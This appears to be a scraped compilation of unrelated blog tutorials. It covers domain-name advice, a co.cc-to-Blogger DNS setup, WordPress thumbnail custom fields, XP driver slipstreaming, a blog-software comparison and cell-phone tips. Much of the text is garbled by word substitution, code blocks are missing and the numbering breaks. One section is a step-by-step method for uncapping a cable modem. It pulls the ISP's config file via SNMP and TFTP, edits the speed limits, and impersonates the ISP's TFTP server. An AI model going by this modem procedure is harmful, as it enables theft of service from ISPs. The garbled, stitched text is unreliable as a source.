Tips on Choosing a Good Domain Name

Before you rush out and choose your domain name or name your website, you might want to consider the following points:

1. Your Domain Name Should Be Your Website Name

Naming your site after your domain may seem obvious to some of you, but you’ll be surprised to learn that not every website is named after the domain name even when the webmaster owns that domain name.

Naming a site after its domain name is vital, for the simple reason that when people reckon of your website, they’ll reckon of it by name. If your name is also your URL, they’ll automatically know where to go. For example, when people reckon of thefreecountry.com, they don’t have to wonder what URL to type into their browser to get there. The name of the site is also the URL.

Imagine if your business (or website) is called “Acme”, but somebody else holds that domain name. Instead, you have some obscure domain name called, say, “mybusiness.com”. What happens when your customers, recalling that Acme has a product they want, type “www.acme.com”? They’ll wind up at your competitor’s website. One lost sale.

In the modern world of the Internet, where people automatically turn to the Web for information, it pays to have a domain name that reflects your site or business. There are just fewer things for your customers or visitors to remember. Moreover, you don’t seriously reckon that they’ll try to memorise an unrelated URL just because you want them to, do you? The only people who’ll memorise it are you and your competitors who want to compare your prices.

What if you cannot get the domain name of your choice? It really depends on how committed you are to that particular name. If you have an existing brand name that you’re known for, you’ll probably not want to ditch that name just because you couldn’t get the domain name. After all, it took you a lot of time and money to establish that name. If so, you might simply want to try to buy over the domain name from the current owner. Check up the “whois” information for the domain, and contact that person listed to see if they’re willing to sell it. You probably should be aware that they are likely to want to charge a higher fee than you’ll normally get when buying new domains (assuming they want to sell it in the first place).

On the other hand, if you’re just starting out, you might prefer the cheaper alternative of trying to obtain a domain name first, and then naming your website (or business) after the domain that you’ve bought. So if you’ve bought, say, the domain name “acme.com”, then your website and business might be named “Acme” or “acme.com”. I know this seems a bit like putting the cart before the horse, but that’s the reality if you don’t want to lose out on the Internet.

2. Generic Names Or Brand Name Domains?

I know that a number of people seem to reckon that your domain name really must be some generic name like “cars.com” if you are selling cars. Witness, for example, how much money those generic names are being sold for. But seriously, if you were looking for a car, you’ll probably already have some brands in mind, and you’re more like to try out things like generalmotors.com or toyota.com rather than just cars.com.

For that reason, I personally feel that a domain name that matches your brand name is very vital. The very name that you use to advertise your product is the name that you will want for your domain, because that is the first thing that people will try in their browser. It is also the simplest thing for them to remember, and whatever that is easily remembered, will be more likely to be tried out than the obscure domain name.

3. Long or Small Domain Names?

Domain names can be of any length up to 67 characters. You don’t have to settle for an obscure domain name like avab.com when what you mean is AcmeVideosAndBooks.com.

Having said that, there appears to be some disagreement about whether a long or small domain name is better.

Some argue that shorter domain names are simpler to remember, simpler to type and far less susceptible to mistakes: for example, “getit.com” is simpler to remember and less prone to typos than “connecttomywebsiteandobtainit.com”.

Others argue that a longer domain name is usually simpler on the human memory – for example, “gaepw.com” is a sequence of unrelated letters that is hard to remember and type correctly, whereas if we expand it to its long form, “GetAnEconomicallyPricedWebsite.com”, we are more likely to remember the domain name.

Some of these arguments are really academic. It’s increasingly hard to get small meaningful domain names. I have not checked, but I’m honestly certain that names like “getit.com” and “excellent.com” have long been sold. If you manage to get a small domain name though, the key is to make sure it’s a meaningful combination of characters and not the obscure “gaepw.com” in my contrived example above.

Long domain names that have your site keywords in them also have an advantage in that they fare better in a number of search engines. The latter give preference to keywords that are also found in your domain names. So, for example, if you have a site on free C++ compilers with a domain name like freecpluspluscompilers.com, it might fare better in a search for “free C++ compilers” than my other site, thefreecountry.com.

Which would I go for? I’d go for the shorter name if I can get a meaningful one, but I’m not averse to longer names. But, I would probably avoid extremely long names verging on 67 characters. Aside from the obvious problem that people might not be able to remember such a long name, it would also be a chore typing it and trying to fit it as a title on your web page.

4. Hyphenated Names?

Should you get a hyphenated name? There are a few things to consider here:

a. Disadvantage: It’s simple to forget the hyphens when typing a name. Many users are used to typing things like freecpluspluscompilers.com but not free-c-plus-plus-compilers.com. They’ll probably leave out the hyphens and wind up at your competitor’s site.

b. Disadvantage: When people recommend your site to their friends verbally, having hyphens in your domain name leads to more potential errors than when the name does not contain hyphens. For example, how do you reckon your visitors will refer to your site if it is named “acme-books-and-videos.com”? They might say, “I visited Acme Book and Videos dot com yesterday. It was fabulous.” Their friends, remembering that comment later, might type into their browsers “acmebooksandvideos.com”. Oops.

c. Disadvantage: It’s a pain in the neck to type. Enough said.

d. Advantage: Search engines can distinguish your keywords better and thus return your site more prominently in search results for those keywords occurring in your domain name.

e. Advantage: The non-hyphenated form may no longer be available. At least this way, you still get the domain name you want.

Personally, I prefer to avoid hyphenated names if I can, but I guess it really depends on your domain name and your situation.

5. Plurals, “The”, and “My” Forms of the Domain Name

Very often, if you can’t get the domain name you want, the domain name registrar will suggest alternate forms of the name you typed. For example, if you wanted website.com, and it was taken (of course it is), it might suggest forms like:

thewebsite.com
mywebsite.com
websites.com

and the like, if they were not already taken as well. The question is, should you take them?

My personal opinion is that if you take the “the…” and “my…” forms of the domain name, you must always remember to promote your site with the full form of the name. Otherwise, people are likely to forget to affix the necessary “the” or “my”. For that reason, I always advertise my sites as “thesitewizard.com” and “thefreecountry.com” in their full domain name forms, rather than just “Free Country” or “Site Wizard” (without the article).

On the other hand, I would not take the plural form of the domain name (eg, websites.com) if I cannot also get “website.com”, since the chance of the visitor failing to type the “s” in the name is very fantastic. Reckon about the well-known name tussle between etoys.com and etoy.com. Many people wanting to go to etoys.com were apparently going to etoy.com instead. If it happened to them, it can happen to you too.

6. COM, ORG, NET, etc?

One common question I encounter is from people who can’t get the “.com” domain of their choice, but find the “.net”, “.org” or other country-specific top level domains (TLDs) available (like .de, .nu, .sg, etc). Should they try for these?

The answer is not as straightforward as you might reckon. If your website or business caters to the local community, such as a pizza delivery business or recruitment agency or the like, then it makes sense to get a country-specific domain. You really benefit from having such a local domain because the people in your country know that they’re dealing with a local entity, which is what they want. After all, if they stay in (say) the United Kingdom, they’re not likely to want to try to order pizza from pizzaparlour.com, which suggests a US or an international site. You’ll have better luck calling it pizzaparlour.co.uk, ie, with a UK domain.

What if yours is a site or business that can benefit from an international audience? There are really many schools of thought on this. I’ll just mention a few common ones.

The first school of thought goes on the premise that it is better to have a domain name of your choice “myperfectdomain” even if it has a TLD of “.net”, “.org” or some other country specific extension, than to wind up choosing an obscure domain name for the simple reason you can’t get your first choice. Thus they would settle for domain names like “myperfectdomain.de” or “myperfectdomain.net” or whatever. Against this is the argument that if you get a country specific domain, people might reckon that your business only caters to that country.

Another school of thought finds that “.net” and “.org” extensions are really quite acceptable domain names. For some, the “.org” extension really describes the non-profit nature of their organisation. So, for example, the well-known Apache web server can be found at “apache.org”.

Others settle for the “.com” extension and no less. As grounds for their arguments, they cite the browser algorithms used to locate a website when a user simply types a name like “acme” into the browser. Apparently, the browser searches for a domain name “acme.com” before attempting “acme.net”, etc. As such, people who do that will be delivered to your competitor’s site if you do not also own the “.com” extension. Indeed, even if people do not rely on their browser to complete their typing, many simply assume a “.com” extension when they type a domain name, so if your business is “Acme”, they’ll just assume your domain name is “acme.com” rather than “acme.net” or some other such name.

As you can see, there are really excellent grounds for accepting any of the above views. My personal footnote to the above arguments is that if you get a domain name with an extension other than “.com”, make sure that you promote your business or website with the full domain name. For example, if your domain name is “dogandcatfood.net”, make sure that when you advertise your site or business, call it “dogandcatfood.net” not “dogandcatfood”. Otherwise people will assume a “.com” extension and travel to the incorrect place.

7. In Conclusion…

In case the forest got lost in the trees (or the reverse) in my arguments here, let me reiterate the main point of this article: get that domain name before you start your site or business.

Don’t make the mistake of attempting to retrofit your domain name to your business or website. thefreecountry.com did not originally start out with that name, and I encountered a huge hassle (and lost visitors) as a result of the URL changes. Don’t make that mistake too.

Most of us will be feeling that the surfing speed which is allocated by our ISP is not enough. People with 64Kbps will reckon 128Kbps will be cool speed. People with 128Kbps will reckon 256Kbps will be cool and so on
This tutorial will teach you how to increase your 64Kbps link to 512Kbps or what ever speed you like.
It is very much possible to do this. With a bit of luck if your Cable Internet Service Provider are very uneducated on how this very new technology works and leave some key loopholes open for you to grab vital information on how to accomplish this task. But this tutorial will no guarantee you 100% success.

Okay here we go. I’m going to try to clarify you as best as I can to accomplish re-configuring your SB5100, SB4100 or SB3100 cable modem

Theory of cable modem working

All the cable modems when it boots up it will search for an “Image file” where in all configuration like your upload speed limit and download speed limit is defined. This “Image file” is stored in ISP`s TFTP server. Modem will be pre-configured with the ISP`s TFTP server IP address and the Image file name to be downloaded. When the modem boots up it query TFTP server and download Image file from TFTP server according to this our speed limits will be set.

Our Mission

Get this Image file from ISP`s TFTP server, reconfigure it according to our need and force our modem to download this file from our Computer rather than downloading it from our ISP`s TFTP server.

Steps to accomplish

1). Get cable modems MAC address
2). Get your ISPs TFTP server IP address
3). Get name and path of the “configuration file” or Image file stored in the ISP`s TFTP server.
4). Download Image file from ISP`s TFTP server.
5). Decrypt the Image file which you downloaded from ISP`s TFTP server
6). Modify the Image file
7). Encrypt the modified Image file
Cool. Change your computer’s TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)
9). Host TFTP server in your computer
10). Place Image file in the base directory of your TFTP
11). Restart your modem
12). Changer your PC’s IP back as given by ISP
13). Done. Start surfing with your new speed

1). Get cable modems MAC address

You can either look at the back of the modem to get this MAC Address or you can logon to your Cable modem with your Web Browser hxxp://192.168.100.1/ . This is internal HTML pages stored within your DOCsis cable modem (SB5100, SB4100 and SB3100) that gives you even more vital information on configuration. Unless it is turned off by your ISP. This feature might be really turned off by your ISP.

2). Get your ISPs TFTP server IP address
3). Get name and path of the “configuration file” or Image file stored in the ISP`s TFTP server.

For getting this vital information you have to do an SNMP walk over your modem. For doing this you can use any one of the tools below

a) There’s a program called QUERY.EXE from Weird Solutions which is a BOOTP packet request program that will tell you everything you need to know, without all these extra steps. It will show the Image Filename, TFTP server address, which is really all you need to get started. To use this BOOTP QUERY tool, you need the MAC address of your cable modem

Experts can use Solarwinds SNMP program

c) Beginners can use DOCSIS Diagnosis utility

d) Beginners can use SNMPWALK Tool

use command “snmpwalk 192.168.100.1 public”

NOTE: Use modem’s IP address as “192.168.100.1″ (SB5100, SB4100 and SB3100) when it questioned to provide by any of the above tools. SNMP community is “Public”

Using the above tools you will get the information of your ISP`s TFTP server IP and the name of your “Image file” stored in that TFTP server
All your vital information is stored in this file, One of which is the MaxRateDown 2621440; MaxRateUp 393216;. (This was my ISP settings. Which you can see is similar to what speed I was getting. 40KB/s up and 250 KB/s down)

Among these, the one we need are:
Configuration TFTP Server = 194.*.*..90 (replace this with yours throughout in the doc)
Configuration filename = isrr.bin (replace this with yours throughout in the doc)
And
IP fragments made = 0
IP address.10.xxx.xxx.xxx = 10.xxx.xxx.xxx
IP address.192.168.100.1 = 192.168.100.1 (the IP address of the cable modem, (replace this with yours throughout in the doc)
IP-to-If-index.10.xxx.xxx.xxx = 2

Suggestion: You can do this step by sniffing the modem i.e. “192.168.100.1″ when modem boots up. I never tried this method. Try your luck.

4). Download Image file from ISP`s TFTP server.

For doing this got to your command prompt and use below commands with out quotes and bracket.

“C:tftp -i GET ”

Okay now you got Image file from your ISP`s TFTP server.

5). Decrypt the Image file which you downloaded from ISP`s TFTP server
6). Modify the Image file
7). Encrypt the modified Image file

Use docsis tool which you can download from

using this program you can decrypt image file change the upload speed and download speed ,save it and encrypt back. Rename this newly made file same as your original image file.

Cool. Change your computer’s TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)

Go to my network place and right click ->properties
Select your LAN Card right click ->property->Internet Protocol (TCP-IP) double click on it and change it to as following values
Configure your TPC’s TCP settings as below
IP: 194.*.*.90 (replace with the ISP’s TFTP server)
Netmask: 255.255.255.0
Gateway: 192.168.100.1 (replace with your cable modem’s IP address)

Note: Gateway should be 192.168.100.1 then only your modem can communicate with computer.

9). Host TFTP server in your computer
10). Place Image file in the base directory of your TFTP
11). Restart your modem

Download TFTP Server software and host TFTP server in your computer

Start TFTPD32 server. Go to Settings and set the Security to None. Increase the timeout to 20secs and the Max Retransmit to 6. Choose to translate UNIX filenames. Make sure it’s base directory point to where the isrr.bin is (i.e. the image file which you modified). If you need to replicate a directory pathname along with the image file, then make a directory from root that corresponds to the image file pathname.

Restart your modem, and AS SOON as the SEND light goes solid, you should see a receive on your TFTP server i.e. your PC

12). Changer your PC’s IP back as given by ISP
13). OOPS Done. Start surfing with your new speed

Now you change your TCP settings of your PC back to normal as given by ISP. (I.e. Place your original IP address and gateway)

Oops you hacked your modem. Test out by downloading some files using DAP (Download accelerator plus)

Note: This speed will remain same until you restart your cable modem. So each time you reboot your modem you have to follow the steps 8,9,10,11 and 12

co.cc is a free domain. It’s not only URL forwarding but we can setup DNS Records, A, MX, and CNAME records.

We can change our blog’s name to become “name.co.cc”.

It’s more simple than we use domain “name.blogspot.com”.

To change our default blogspot name to co.cc domain name there are some steps to do.

Here is the tutorial to setup domain co.cc

1. Open your browser to co.cc
2. Then regiter a domain that you want to use.
3. If it’s no available you have to find another domain name. But if it’s available then you can register it.
4. The you have to setup your domain. Got to “setup–>Manage domain”
5. Choose “Zone Records”
6. In the coloumn “Host” fill it with your domain name (www.yourdomainname.co.cc”)
7. Choose “CNAME” for “Type”
8. In the “Value” box fill it with “ghs.google.com”
9. Then click “Setup” Button.

The next step is make some setup in blogspot.

1. Login to Bloggr/blogspot then choose “Setting–>Publishing”
2. Then choose “Switch to: • Custom Domain
3. Then click on “Already own a domain? Switch to advanced settings“
4. Fill it with your new domain in the “Your Domain” coloumn.

5. To End click “Save Setting” Button.

It will take 1-48 hours for your new domain to work. So be patient….

Add Thumbnails to Wordpress with Custom Fields

In this tutorial, I’ll show you how you can easily add thumbnails, lead image, and other extras to individual posts in Wordpress. These images can be shown on the front page, archives, search pages, etc – but appear outside of the content, giving you full control of their placement and style.

What Are Custom Fields?

If you’re reading through this article, there’s a possibility you’ve never heard of Custom Fields (or maybe you just haven’t seen a use for them yet). Essentially, all a Custom Field does is allow you to add extra pieces of data to individual Wordpress posts that otherwise aren’t there by default. In other words, along with things like the Post Title, Entry, and Categories, you could add:

Thumbnail
Lead Image
Price (perhaps each of your posts is a product that you need a price mark for)

Sure – but you COULD also just place those in the post… right?

Of course, but when you do that, you’re stuck with your default posting format and styling. What if you want to have a Thumbnail for your post, but instead of the thumbnail appearing inside of the post entry, you only want that thumbnail to appear on the front page of your blog – and using a completely different style than it would in your entry?

This is where Custom Fields come into play. They allow you to add as many additional fields as you like, all of which can be used anyway you want to use them.

Adding a Custom Field

The first step to making custom fields work is to really add one to your Wordpress Blog. To do this, simply start making a New Post, and scroll down the page until you see “Advanced Options“. Under this heading, you should see something like, Excerpt, Trackback, and Custom Fields.

To add a Custom Field for a Thumbnail, just fill in the Key with “Thumbnail”. For the Value, post the full URL of the thumbnail you want to use.

Click Add Custom Field, and it will apply to that post.

Making Thumbnails for your Posts

Now that you have a key called Thumbnail, you’ll never have to make that key again. It’s stored so you may select it from the dropdown box for now on.

In each post that you’d like to have a thumbnail, you’ll have to go to the Custom Fields area of your Write Post page, select “Thumbnail”, and fill in a value with the path to the thumbnail you’d like to use.

Now, let’s insert this thumbnail into your post listings on the front page.

In your theme files (I am assuming that you have a basic understanding of modifying themes in Wordpress), open up index.php. Find these lines:

The code between these lines is the output for each individual entry shown on the front page of your Blog. So, let’s say you limit your blog to 10 posts per page, this is the code the repeats 10 times to show those 10 posts.

Within these lines, we want to add the following code in order to show our newly made thumbnails:

This outputs an image, using the Value of the Key, Thumbnail, which we’ve inserted into our post. It can be inserted ANYWHERE within the while loop, allowing you to float it to the left or right of the header and entry, show it above an entry, below, whatever you want.

Fantastic, but I want this to show up In the Individual Post Too

That’s possible as well, using the same code as shown above. You just need to make sure you insert the code that displays your thumbnail in the while loop.

Maybe you want to show a different image on your post page, such as a larger or smaller version of your thumbnail. At Tutorial9, we often times have Lead Images at the top of our posts which are much larger than our thumbnails. This is very simple to achieve as well.

On your Write Post page, add another Key to your Custom Fields called “Lead Image“, with a value pointing to the URL of your lead image.

Now, in your single.php theme file, insert the following code inside of the loop:

Only Show a Thumbnail or Lead Image on Some Posts

Maybe some of your posts don’t require thumbnails or lead images. We don’t want to output unnecessary code… With a few additional lines, we can fix this problem.

First off, we’ll want to place this right after the loop starts:

This won’t output anything in HTML, but will store the value of our Thumbnail field in a variable called $Thumbnail. If the field was left empty during the post creation process, this variable will also be empty.

Next, we need to modify our output a bit:

What this does, is checks to see if the Thumbnail variable is empty. If it isn’t empty, the code will output the thumbnail image. But, if it is, nothing will be shown here.

After you’re finished modifying your code, upload, and test to make sure thumbnails are being showed properly.

How to install XP on HP laptop OR Resolving “Setup did not find any hard disk drives” during Windows XP Installation

One of the most well loved topics among our readers is installing Windows XP on your new Windows Vista computer – sometimes for compatibility reasons, but also because a lot of people just don’t like Vista very much.

The problem that people keep running into left and right is getting to the point where XP starts to install and getting the message “Setup did not find any hard disk drives installed in your computer”. This error happens because your new computer has a storage controller that isn’t supported natively in XP, usually an SATA (Serial ATA) controller.

If you don’t have a floppy drive in your computer (who does anymore), then you’ll need to use a process called slip-streaming to integrate the storage drivers into your XP installation CD.

It should go without saying that this is an advanced topic, so proceed with caution.

Making a Custom XP Install

We’ll use a software called nLite to make a new XP install cd, so you’ll first need to download and install it. Once it starts up, you’ll be prompted for your Windows installation, so you’ll want to click the Browse button.

First you’ll be prompted for the “Windows installation”, which really means your XP install CD. Find it and select the root of the installation, and then click OK to go to the next dialog.

Next you’ll be prompted on where you want to save the temporary files used during the slip-streaming process. I chose to make a new directory and called it XPISO, but you can place it wherever you’d like. I just recommend to use a new directory.

nLite will copy all the necessary files off the XP installation and into the temporary folder. When it’s done, you’ll see all the information on which version it is.

Hit the next button until you come to this screen, where you can select what options you want. Select “Drivers” and then “Bootable ISO”.

Side note: You can select any of the other options if you’d like. nLite will let you bundle updates, set tweaks or automatically remove components from the installation, but that all goes beyond the scope of this article.

Hit the next button until you get to the screen for selecting drivers. If you click the Insert button, you can choose between adding a single driver or adding a folder of drivers. Since we’ll just be loading a single driver, you can choose that option, but you might want to first read the section below about finding drivers for XP.

Browse to the directory where you extracted the driver files, and then select Open. Note that it doesn’t really matter which of the *.inf files you choose, because it will select all files in the folder anyway.

nLite will prompt you to select your driver. If you don’t know which exact one it is, you can either use Device Manager in Vista to find the exact model, or you can just select all of them. Just be careful not to select a 64-bit driver if you are using 32-bit, or the incorrect OS version.

I would recommend including both Storage and Network drivers, as those are the most common drivers that are missing in XP.

Once you proceed to the next screen, now we can finally end the process. You can choose to directly burn the cd here, or you can select Make Image to make an ISO file that you can burn to a CD using whatever burning tool you have.

Note: If you chose to make an ISO, make sure to use the “Make ISO” button before you click Next.

At this point you can burn the ISO image to a CD, and then start your XP installation process.

Finding Drivers for XP

The best place to search for drivers for your hardware is at the manufacturer’s support website. The only problem is that nearly every manufacturer seems to distribute their drivers in floppy disk image form, even though the computer they are for doesn’t have a floppy drive. Guess nobody has alerted them to get with the program.

We can still extract the drivers using an application called WinImage. Let’s run through a quick example… Here you can see the Intel SATA controller driver for my HP computer.

I downloaded and ran the executable, which extracted a file called f6flpy32.exe into a temporary directory. Don’t bother trying to run this one, because it’ll just prompt you for a floppy drive.

So how to get the drivers out of this file? There are a few options that you can try, depending on how the manufacturer packed the files.

You can use Winimage to extract them, which is a shareware software, but you can use it during the trial period for free.
You can try and use WinRar to extract the file. In many instances this will extract a *.flp file, which you can mount in a VMware virtual machine or potentially with some ISO mounting software.
Some drivers will allow you to automatically extract into a directory. You’ll have to try it and see what happens.

Here’s the list of files that Winimage can handle, which is quite a lot.

Start WinImage and then open the file, and you should see the contents. Just extract them to a folder, preferably with a useful name so you can remember it later.

WordPress Vs Drupal Vs Expression Engine: Which Blog Software Should I Use?

As a result of my recent spate of articles on blogging, I have received a number of messages from would-be bloggers asking which blogging software they should install.

There are some factors to consider when choosing a blog software. Essentially, it boils down to your plans for your blog, your abilities and whether you are going to be running multiple blogs with multiple authors.

There are many blogging scripts available. I will only examine three blogging software in this article for the simple reason that, at the time I write this, these are the only three that I have sufficient experience with. But, since they are among the most well-known programs around, and are probably the ones you are checking out anyway, this article is likely to be relevant to the majority of people considering a blogging platform.

(Perhaps the only other well-known blogging software that I’m not covering in this article is Movable Type. Again, it’s for the earlier-stated reason that, at the time I write this, I have not used it long enough and in as thorough a fashion as the others to include it.)

Note that I am not going to cover the blogging web hosts(with their custom blogging platforms) at all, since choosing blogging web hosts involves more issues than those discussed here. This article only targets people who are thinking of installing a blog software on their own web hosting account, probably obtained from a normal commercial web host.

Blogging Software Comparison

WordPress

WordPress is arguably the most well loved blogging software used today, and with excellent reason. It is extremely simple to install, even for newcomers, and works very well out-of-the-box. The default setup requires very small tuning to make it search engine friendly, and what tuning it needs can be easily done from within the WordPress user interface. There’s no need to meddle under the hood to write PHP code or whatnot just to get it working the way you want it to.

It also has a lot of plugins available, so even things that are not supported by default, like the meta description tag, can be easily added by means of a plugin, as mentioned in my other article General Principles for Designing a New Theme or Template for Your Blog.

This is probably the software you should use if you satisfy the following conditions:
1. You want to “just blog”, and don’t want to mess around with programming code, website design and the like.
2. You are satisfied either with the default theme (appearance) provided by WordPress, or can find a WordPress theme from a third party that suits your requirements.
3. You are a solitary blogger – you don’t need support for separate blogs on one website, where there are different people posting to different blogs.
Personally, I feel that WordPress is probably a excellent choice for most casual bloggers. It particularly excels if you are a newcomer to web development, since the default setup is perfectly usable if you are not too fussy.

It’s also free.
Drupal

Drupal is more than just a blogging tool, although more and more people are using it to blog. It is a full-fledged content management system (CMS), which means that you can use it to run your whole website, set up forums, shopping carts, normal web pages, etc. As a consequence of this, it is also considerably harder to set up than WordPress.

The default setup for Drupal also needs some work before it can be used optimally for blogging. But, its fundamental design as a CMS starts to shine when you need to support multiple blogs with multiple authors. Support for multiple blogs, multiple sites and multiple authors come built-in with Drupal.

Designing your site to look and behave the way you want it to with Drupal, but, will probably be a daunting task for many people. Don’t undertake it unless:
1. You know CSS and HTML. If you only know how to design web sites using WYSIWYG web editors like Nvu and Dreamweaver, you don’t qualify.
2. You know how to write PHP programs. Yes, you read it right — knowledge of PHP is mandatory.
3. You are willing to devote time to deciphering the Drupal source code. (Remember, this is someone else’s code, so deciphering it takes more time and effort than figuring out your own.)
  In addition, don’t be deceived by appearances – it may appear as though you can configure a Drupal theme by simply modifying (or making) some theme files. But, you will soon find that some features can only be supported or suppressed by going through the other files in the Drupal core modules. (Unfortunately, which files these are is not necessarily documented nor where you expect them to be.) In other words, there’s no clean separation of things in the Drupal source code — to change or support particular features, you will have to go through many files that are all over the place.
To sum up, use Drupal if:
1. You need support for multiple blogs and multiple authors. Drupal’s built-in support for this is superb.
2. You don’t need to implement your own theme or template, or you don’t mind spending time to figure out the Drupal source code and have the programming (PHP) and designing (HTML/CSS) ability to do it.
Drupal is free.
Expression Engine

Expression Engine is a powerful content management system that can be used to manage your website and blog.

Where this software really shines is the ease with which you can configure your site and the extent you can control things. Unlike Drupal, you don’t have to be a programmer to make your own theme, and for the most part, you can even use WYSIWYG web editors like Dreamweaver to design the appearance of your web pages. You simply have to add some tags into the parts of your pages where you want your posts to appear, etc, when you’re done. In spite of this ease of configuration, you can control and configure just about every aspect of your blog or website’s appearance and behaviour. For example: do you want a meta description tag field? Just make a “custom tag”, add it to your template, and the field will automatically appear in the Post screen when you write a new entry.

While the software is a web designer’s dream, its out-of-the-box configuration at the time I write this is less than ideal. The default theme that ships with Expression Engine is, quite frankly, something that no self-respecting webmaster would want to use. Note that I’m not talking about the appearance here. The title tags of every page on your blog is by default the name of your blog. If you don’t know why that is not a excellent thought, read my article How to Make a Search Engine Friendly Website. Your page web statistics is also, by default, showed on your web pages. (Come on people, only newbies want to show how many people visited their website! Everyone else uses their stats for other purposes.) The 404 page, along with the proper 404 HTTP status code, is not showed in the default theme for missing pages, whereas WordPress and Drupal has support for showing 404 pages out of the box: the webmaster doesn’t have to mess around with about such petty details.

Use this software, if:
1. You want to configure your own theme for your blog. I know of no other blog software that comes even close to how simple you can control every single aspect of your blog. Try designing for Drupal and then go to Expression Engine and you’ll know what I mean. And you don’t even have to be a programmer to do this.
2. You are willing to pay for a licence if you run a commercial site.
This is commercial software. A limited version (the “Core” version) is free for personal use.

Blow-by-Blow Feature List Comparison (or Lack Thereof)

I did not include a comparison of the list of features between the three blogs because all of them include the necessary features you will need to make, post and maintain a blog. Indeed, in view of the extensible nature of all of the software, you will probably be able to find plugins, add-ons, or modules (or whatever the particular software wants to call the third party extensions), to supply any feature you want. A detailed comparison of the features is thus a waste of time.

Performance Differences

Although I initially wanted to to include performance measurements of the different blogging software, I realised that to do so would be like comparing apples to oranges since my blogs using the three software have different topics, posts, template design, target audience and even web hosts. These factors conspire to make any comparison of their performance problematic. I cannot even measure the number of SQL requests each of them uses, since those, to some extent, also depend on my templates, which differed between my sites, how I configured the software and the traffic the blogs receive.

All I can say is that using any blog software causes greater resource usage than a static site like thesitewizard.com, and on occasion, it is possible for me to perceive a difference in response time in the pages delivered by the blogs from those on my static sites. Of course this isn’t saying much, since it’s a given. But I chose to note it here, since if I don’t, I’ll probably get a deluge of messages asking me about performance considerations.

While I was in the past obsessed with optimizing performance, I’ve nowadays mostly resigned myself to the fact that any dynamic site requires greater resources, and that one day, these sites will need to go to their own dedicated server(s).

Verdict to the Blogging Software Shootout

As you probably have realised by now, which blogging platform you choose for your site depends on your needs and to a certain extent ability. If you go through the list of strengths and weaknesses of each of the platforms mentioned above, as well as my notes on when you should use each of these blogging scripts, you should be able to choose on the software that is best for your purposes.

85 Cell Phone Hacks

Every generation is presented with new technologies of which the previous generation would and, in all likelihood, could never have imagined. With the realization of each new thought arrives a more efficient and simpler method of performing a common task. While the basic premise behind this process of simplification is excellent, for those who do not know how to make it work for them it is useless (worthless). The newest generations have no problem with figuring out how to make these gadgets work for them. But if you are in your thirties or above, chances are you are either asking your children to figure it out for you and then show you how to do it or you are just using the basic functions you can figure out on your own. So for those of you who could use a quick reference guide for how to make your cell phone work for you, here it is. Delight in these tips, tricks and hacks which will allow you to finally delight in all of the capabilities of your cell phone.

1. Mobile Web: Internet access anywhere anytime is a fantastic opportunity to perform certain tasks while you are out running errands or even on your lunch or break at work. Most mobile phone service providers offer a plot which includes internet service. It is generally not fiscally responsible to access the internet on your phone if you don’t have a plot unless you don’t mind the astronomical cell phone bill you will receive. With mobile web you can read and send email, sign up for mobile banking services where you can pay bills and transfer funds, and you can check the weather or bet directions.

2. Speed it up. Mobile web is inarguable a highly valuable asset for business and domestic purposes. 3. Unlock your phone. Many service providers lock your phone so that you cannot obtain service on that particular cell phone through any other provider. For those who do not know how to tell if their phone is locked, just place a sim card from another provider into your phone and turn it on. If you get any type of message stating the phone cannot access service, your phone is locked. What benefit is there to unlocking your phone? If your phone is locked, you cannot access service with any other provider. This can be especially frustrating if you are traveling and trying to avoid roaming charges or if you have a excellent cell phone you still want to use and want to switch your service to a different provider.

4. Get the service provider code. To unlock your phone, you must have a code from the service provider or the phone manufacturer. You can contact your service provider and question their customer service representative to provide you with the unlock code, but they may be less than cooperative. Your other option is to check out one of the sites which offer unlock codes or remote unlock services for a relatively cheap price. You just enter the code into your phone and voila. You can then use your phone to get service from any provider you choose without having to buy a new phone and a new phone number. You can buy a sim card to be used when traveling out of your country of residence and avoid the insanely expensive phone bills.

5. Debranding your phone will remove the logos, images, themes, profiles and other predefined memory hogging items placed on your cell phone by the manufacturer and/or service provider. When you debrand your phone, you can increase your available memory and rid your phone of locks which prevent you from being able to obtain free ringtones and images from other providers.

6. Firmware upgrades. When you buy your cell phone you do so with the understanding that a newer, more advanced software version will be introduced afterwards. Though you know this will inevitably occur, it doesn’t prevent the frustration you feel when you see all of the features and additional benefits offered on the newer version. Firmware upgrades will allow you to access and load the newer version of the software onto your older cell phone version. This can be done through a remote server comparable to those which offer the unlocking service.

7. Flashing your cell phone will clear unwanted manufacturer trial games and predetermined themes from your cell phone. This will provide you with additional memory and save you from having to look at these unwanted items in your menu every time you scan through it. 10. Free international calls. In the past, if you want to talk to someone across an ocean you should be prepared to pay. That is until Rebtel and Talkster developed an ad-supported free service to make these once outrageously expensive calls completely free. The service works by making local phone numbers for both parties. One party would call a local number generated for them and the other party would have to hang up the phone and call back to their local number. The call is routed through a VoIP server and is at no cost to either party if completed correctly.

11. Voice to Text. Since we cannot all afford to have a personal assistant like the celebrities or the rich, we have to make due with what is at our disposal. ReQall is a service which employs voice recognition software to make a text from your voice recording. The text is sent to you as a reminder or a list of things you need to accomplish or items you need to pick up. It can work with some calendar software to record events and dates.

12. Use your cell phone as a modem. Some people get free, unlimited internet use with their cell phone and the speed isn’t half terrible. If you are lucky enough to get this service, why would you want to pay for internet service on your desktop or laptop computers when you can use your cell phone as a modem? There are also times when those of you who do pay for the additional service may not be in the proximity of the network to receive the signal and so you could also benefit from a mobile modem. This process is referred to as tethering. Since each cell phone manufacturer has its own unique software and programming, the method used to tether your windows mobile phone may vary based on the type of phone you own. Before you attempt this process, make sure you have a sufficient data plot to cover the information you will be routing through your mobile phone. If not, you could be dealing with a massive phone bill. Listening to voicemail messages requires silent and a small bit of time and if you are small on either it can be hard to accomplish the task. And then there is the missed call from the person you dread hearing from who you just know left you a message. Now you can organize your voicemail and even choose who gets to leave a message. This way you can listen to the vital phone calls and disregard those which can be left for later. YouMail allows you to choose how you get your voicemail messages; phone, email or their web site. On the YouMail website you will be able to see a list of who called. You also have the option of adding photos so the person’s photo appears when they call. YouMail features custom greetings you can tailor to individual callers. There is even an option which allows you to order the system to hang up on callers who you don’t want leaving a message for you.

14. Go straight to voicemail. At one time or another, we have all attempted to make a phone call with the hopes that the person we were dialing wouldn’t answer. When the person does answer we awkwardly say something about not expecting them to answer and just intended to leave a voice message. It is an uncomfortable situation for all involved; they know you didn’t want to talk to them and you know they know it. Slydial offers an actual escape from this tough situation. You dial the Slydial service phone number and it takes you directly to the voicemail system without allowing the phone to ring. So there is no risk of the person answering your call.

